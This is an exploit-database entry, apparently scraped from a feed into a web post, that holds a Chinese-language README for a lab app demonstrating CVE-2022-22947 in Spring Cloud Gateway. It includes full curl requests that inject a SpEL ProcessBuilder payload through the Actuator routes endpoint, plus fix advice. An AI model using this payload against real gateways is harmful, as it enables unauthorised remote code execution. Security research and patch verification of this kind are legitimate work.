{“lastseen”:”2025-08-13T08:36:42″,”description”:”# CVE-2022-22947 Spring Cloud Gateway \u6f0f\u6d1e\u9a8c\u8bc1\u5e94\u7528\\n\\n\u8fd9\u662f\u4e00\u4e2a\u4e13\u95e8\u7528\u4e8e\u6f14\u793a\u548c\u9a8c\u8bc1 CVE-2022-22947 \u6f0f\u6d1e\u7684 Spring Cloud Gateway \u5e94\u7528\u3002\u8be5\u5e94\u7528\u7a0b\u5e8f\u4f7f\u7528\u4e86\u6613\u53d7\u653b\u51fb\u7684 Spring Cloud Gateway \u7248\u672c\uff0c\u53ef\u4ee5\u901a\u8fc7 Actuator \u7aef\u70b9\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\\n\\n## \u6f0f\u6d1e\u6982\u8ff0\\n\\nCVE-2022-22947 \u662f Spring Cloud Gateway \u4e2d\u7684\u4e00\u4e2a\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\u3002\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7 Actuator \u7aef\u70b9\u52a8\u6001\u6dfb\u52a0\u5305\u542b\u6076\u610f SpEL \u8868\u8fbe\u5f0f\u7684\u8def\u7531\u6765\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\\n\\n## \u73af\u5883\u8981\u6c42\\n\\n- Java 11+\\n- Maven 3.6+\\n- macOS \u7cfb\u7edf\uff08\u7528\u4e8e\u8ba1\u7b97\u5668\u6f14\u793a\uff09\\n\\n## \u542f\u52a8\u5e94\u7528\\n\\n“`bash\\nmvn spring-boot:run\\n“`\\n\\n\u5e94\u7528\u5c06\u5728 `http:\/\/localhost:8080` \u4e0a\u542f\u52a8\u3002\\n\\n## \u6f0f\u6d1e\u9a8c\u8bc1\u6b65\u9aa4\\n\\n### \u7b2c\u4e00\u6b65\uff1a\u6dfb\u52a0\u6076\u610f\u8def\u7531\\n\\n\u53d1\u9001 POST \u8bf7\u6c42\u5230 `\/actuator\/gateway\/routes\/test` \u7aef\u70b9\uff0c\u6dfb\u52a0\u5305\u542b\u6076\u610f SpEL \u8868\u8fbe\u5f0f\u7684\u8def\u7531\uff1a\\n\\n“`bash\\ncurl -X POST http:\/\/localhost:8080\/actuator\/gateway\/routes\/test \\\\\\n -H \\”Content-Type: application\/json\\” \\\\\\n -d ‘{\\n \\”id\\”: \\”test\\”,\\n \\”filters\\”: [\\n {\\n \\”name\\”: \\”AddResponseHeader\\”,\\n \\”args\\”: {\\n \\”name\\”: \\”Result\\”,\\n \\”value\\”: \\”#{new java.lang.ProcessBuilder(\\\\\\”open\\\\\\”, \\\\\\”-a\\\\\\”, \\\\\\”Calculator\\\\\\”).start()}\\”\\n }\\n }\\n ],\\n \\”uri\\”: \\”http:\/\/example.com\\”,\\n \\”predicates\\”: [\\n {\\n \\”name\\”: \\”Path\\”,\\n \\”args\\”: {\\n \\”_genkey_0\\”: \\”\/test\\”\\n }\\n }\\n ]\\n }’\\n“`\\n\\n### \u7b2c\u4e8c\u6b65\uff1a\u5237\u65b0\u8def\u7531\\n\\n\u53d1\u9001 POST \u8bf7\u6c42\u5230 `\/actuator\/gateway\/refresh` \u7aef\u70b9\u6765\u5237\u65b0\u8def\u7531\uff1a\\n\\n“`bash\\ncurl -X POST http:\/\/localhost:8080\/actuator\/gateway\/refresh\\n“`\\n\\n### \u7b2c\u4e09\u6b65\uff1a\u89e6\u53d1\u6076\u610f\u4ee3\u7801\\n\\n\u8bbf\u95ee\u6076\u610f\u8def\u7531\u6765\u89e6\u53d1\u4ee3\u7801\u6267\u884c\uff1a\\n\\n“`bash\\ncurl http:\/\/localhost:8080\/test\\n“`\\n\\n### \u9884\u671f\u7ed3\u679c\\n\\n\u6210\u529f\u5229\u7528\u6f0f\u6d1e\u540e\uff0cmacOS \u8ba1\u7b97\u5668\u5e94\u7528\u7a0b\u5e8f\u5c06\u4f1a\u542f\u52a8\u3002\\n\\n## \u5173\u952e\u8bf7\u6c42\u4fe1\u606f\\n\\n### 1. \u6dfb\u52a0\u6076\u610f\u8def\u7531\u7684\u8bf7\u6c42\\n\\n**\u7aef\u70b9**: `POST \/actuator\/gateway\/routes\/test`\\n\\n**\u8bf7\u6c42\u5934**:\\n“`\\nContent-Type: application\/json\\n“`\\n\\n**\u8bf7\u6c42\u4f53**:\\n“`json\\n{\\n \\”id\\”: \\”test\\”,\\n \\”filters\\”: [\\n {\\n \\”name\\”: \\”AddResponseHeader\\”,\\n \\”args\\”: {\\n \\”name\\”: \\”Result\\”,\\n \\”value\\”: \\”#{new java.lang.ProcessBuilder(\\\\\\”open\\\\\\”, \\\\\\”-a\\\\\\”, \\\\\\”Calculator\\\\\\”).start()}\\”\\n }\\n }\\n ],\\n \\”uri\\”: \\”http:\/\/example.com\\”,\\n \\”predicates\\”: [\\n {\\n \\”name\\”: \\”Path\\”,\\n \\”args\\”: {\\n \\”_genkey_0\\”: \\”\/test\\”\\n }\\n }\\n ]\\n}\\n“`\\n\\n### 2. \u5237\u65b0\u8def\u7531\u7684\u8bf7\u6c42\\n\\n**\u7aef\u70b9**: `POST \/actuator\/gateway\/refresh`\\n\\n### 3. \u89e6\u53d1\u6f0f\u6d1e\u7684\u8bf7\u6c42\\n\\n**\u7aef\u70b9**: `GET \/test`\\n\\n## \u6f0f\u6d1e\u5206\u6790\\n\\n\u8be5\u6f0f\u6d1e\u5141\u8bb8\u653b\u51fb\u8005\u901a\u8fc7 Actuator \u7aef\u70b9\u52a8\u6001\u6dfb\u52a0\u8def\u7531\uff0c\u5e76\u5728\u8def\u7531\u8fc7\u6ee4\u5668\u4e2d\u4f7f\u7528 SpEL \u8868\u8fbe\u5f0f\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\u6f0f\u6d1e\u7684\u6838\u5fc3\u5728\u4e8e Spring Cloud Gateway \u5bf9\u8def\u7531\u914d\u7f6e\u4e2d\u7684 SpEL \u8868\u8fbe\u5f0f\u5904\u7406\u4e0d\u5f53\u3002\\n\\n## \u4fee\u590d\u5efa\u8bae\\n\\n1. \u5347\u7ea7\u5230 Spring Cloud Gateway 3.1.1+ \u6216 3.0.7+\\n2. \u7981\u7528 Actuator \u7aef\u70b9\u6216\u9650\u5236\u8bbf\u95ee\\n3. \u4f7f\u7528 Spring Security \u4fdd\u62a4 Actuator \u7aef\u70b9\\n\\n## \u7248\u672c\u4fe1\u606f\\n\\n- Spring Boot: 2.6.2\\n- Spring Cloud: 2021.0.0\\n- Spring Cloud Gateway: 3.1.0 (\u6613\u53d7\u653b\u51fb\u7248\u672c)\\n\\n## \u6ce8\u610f\u4e8b\u9879\\n\\n\u26a0\ufe0f **\u5b89\u5168\u8b66\u544a**: \u6b64\u5e94\u7528\u4ec5\u7528\u4e8e\u6559\u80b2\u548c\u5b89\u5168\u7814\u7a76\u76ee\u7684\u3002\u8bf7\u52ff\u5728\u751f\u4ea7\u73af\u5883\u4e2d\u4f7f\u7528\u6216\u90e8\u7f72\u6b64\u5e94\u7528\u3002\\n\\n\u26a0\ufe0f **\u6cd5\u5f8b\u58f0\u660e**: \u4f7f\u7528\u6b64\u5e94\u7528\u8fdb\u884c\u6f0f\u6d1e\u6d4b\u8bd5\u65f6\uff0c\u8bf7\u786e\u4fdd\u60a8\u6709\u9002\u5f53\u7684\u6388\u6743\u3002\u672a\u7ecf\u6388\u6743\u7684\u6d4b\u8bd5\u53ef\u80fd\u8fdd\u53cd\u6cd5\u5f8b\u6cd5\u89c4\u3002”,”published”:”2025-08-08T08:40:24″,”modified”:”2025-08-08T08:43:51″,”type”:”githubexploit”,”title”:”Exploit for Code Injection in Vmware Spring_Cloud_Gateway”,”source”:””,”references”:””,”id”:”F2E4B773-91F0-59FF-A88F-8896ED7892F1″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2022-22947″],”sourceData”:””,”sourceHref”:””,”cvss”:{“score”:10,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:C\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/github.com\/skysliently\/CVE-2022-22947-pb-ai”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-08-13T08:36:42″,”description”:”# CVE-2022-22947 Spring Cloud Gateway \u6f0f\u6d1e\u9a8c\u8bc1\u5e94\u7528\\n\\n\u8fd9\u662f\u4e00\u4e2a\u4e13\u95e8\u7528\u4e8e\u6f14\u793a\u548c\u9a8c\u8bc1 CVE-2022-22947 \u6f0f\u6d1e\u7684 Spring Cloud Gateway \u5e94\u7528\u3002\u8be5\u5e94\u7528\u7a0b\u5e8f\u4f7f\u7528\u4e86\u6613\u53d7\u653b\u51fb\u7684 Spring Cloud Gateway \u7248\u672c\uff0c\u53ef\u4ee5\u901a\u8fc7 Actuator \u7aef\u70b9\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\\n\\n## \u6f0f\u6d1e\u6982\u8ff0\\n\\nCVE-2022-22947 \u662f Spring Cloud Gateway \u4e2d\u7684\u4e00\u4e2a\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\u3002\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7 Actuator…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,36,12,32,13,7,11,5],"class_list":["post-10527","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-100","tag-exploit","tag-githubexploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n